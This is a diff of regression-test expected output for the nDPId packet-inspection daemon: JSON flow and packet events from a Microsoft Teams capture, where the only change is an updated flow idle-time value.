00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2696,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMZh4AAEARkejAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="} 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2697,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMyucAAEARLR\/AqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2699,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041695611} 
@@ -493,11 +493,11 @@ 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2702,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1587041695890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695890,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMMbQAAEARxlLAqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2715,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041696611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2715,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041696574,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697061,"flow_last_seen":1587041697061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041697061,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1587041697061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041697061,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyYAbtVmTcwAAAAALAC\/\/8wcwAAAgQFtAEDAwUBAQgKMITmwQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1587041697091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041697091,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8X+VAAG4GOLAoT4opwKgBBgG77Jhhqm+9VZk3MaASIADeAQAAAgQFoAEDAwgEAggKC\/ZmGDCE5sE="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1587041697091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041697091,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyYAbtVmTcxYapvvoAQEAkclQAAAQEICjCE5t4L9mYY"} 
-00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041697061,"flow_last_seen":1587041697092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041697092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697061,"flow_last_seen":1587041697061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041697061,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1587041697061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041697061,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyYAbtVmTcwAAAAALAC\/\/8wcwAAAgQFtAEDAwUBAQgKMITmwQAAAAAEAgAA"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1587041697091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041697091,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8X+VAAG4GOLAoT4opwKgBBgG77Jhhqm+9VZk3MaASIADeAQAAAgQFoAEDAwgEAggKC\/ZmGDCE5sE="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1587041697091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041697091,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyYAbtVmTcxYapvvoAQEAkclQAAAQEICjCE5t4L9mYY"} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041697061,"flow_last_seen":1587041697092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041697092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet 
type","datalink":1,"packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041697412} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041697244,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2761,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041697611} 
@@ -506,60 +506,60 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1587041697660,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1587041697660,"pkt":"KDc3AG3IEBMx8Tl2CABFoAA40fgAADUBJWpdR27NwKgBBgMDcCsAAAAARQAASh2AAAAyEd1gwKgBBl1Hbs3DdD\/NADaJWQ=="} 00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2774,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1587041697673,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1587041697673,"pkt":"KDc3AG3IEBMx8Tl2CABFoAA4akMAADUBjR9dR27NwKgBBgMDcBsAAAAARQAAWp4wAAAyEVygwKgBBl1Hbs3DdD\/NAEaJWQ=="} 
-00938{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041693828,"flow_last_seen":1587041694047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6930,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00824{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
-00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693582,"flow_last_seen":1587041694243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":220,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00938{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041693828,"flow_last_seen":1587041694047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6930,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
+00824{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693582,"flow_last_seen":1587041694243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":220,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041697660,"flow_last_seen":1587041697673,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00937{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1587041693849,"flow_last_seen":1587041697765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7358,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1587041676435,"flow_last_seen":1587041676536,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12621,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1300,"flow_first_seen":1587041677243,"flow_last_seen":1587041697130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":750126,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041682144,"flow_last_seen":1587041685098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9034,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1587041685240,"flow_last_seen":1587041685471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":30424,"flow_avg_l4_payload_len":585,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685984,"flow_last_seen":1587041686156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8124,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00937{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1587041693849,"flow_last_seen":1587041697765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7358,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1587041676435,"flow_last_seen":1587041676536,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12621,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1300,"flow_first_seen":1587041677243,"flow_last_seen":1587041697130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":750126,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041682144,"flow_last_seen":1587041685098,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9034,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1587041685240,"flow_last_seen":1587041685471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":30424,"flow_avg_l4_payload_len":585,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
+00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685984,"flow_last_seen":1587041686156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8124,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 
